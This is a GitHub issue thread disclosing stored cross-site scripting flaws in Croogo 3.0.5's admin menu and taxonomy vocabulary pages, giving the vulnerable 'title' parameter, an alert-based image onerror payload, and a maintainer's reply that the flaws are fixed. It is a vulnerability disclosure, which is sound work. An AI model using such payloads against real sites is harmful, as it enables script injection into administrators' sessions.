### ISSUE TITLE
Croogo-3.0.5 Cms Has Multiple Stored XSS Vulnerabilities

### ISSUE THREAD

**Issue by vkbiu** [croogo/croogo#940]
URL：http://10.211.55.7/croogo-3.0.5/admin/menus/menus
Payload:<img src=0 onerror=alert(/XSS/)>
parameter：title
![15748644873265](https://user-images.githubusercontent.com/30080697/69732081-f6e82700-1165-11ea-82fb-57771e2c8b2a.jpg)
![15748645130360](https://user-images.githubusercontent.com/30080697/69732131-08313380-1166-11ea-9f88-716fbe03383b.jpg)

URL:http://10.211.55.7/croogo-3.0.5/admin/taxonomy/vocabularies
Payload:<img src=0 onerror=alert(/XSS9/)>
parameter:title
![15748649356954](https://user-images.githubusercontent.com/30080697/69732153-11ba9b80-1166-11ea-974b-8738a3867de4.jpg)
![15748648788481](https://user-images.githubusercontent.com/30080697/69732185-24cd6b80-1166-11ea-84ba-4d444a3782d1.jpg)

**Comment by rchavik** [comment]
Already fixed cafaaabe2cef3d1d83652370e30563e6ad7c4158 and 4edb1ff597b4cfa01db73163a6cbd6d11ac4e8f0.

Will create new tag shortly.
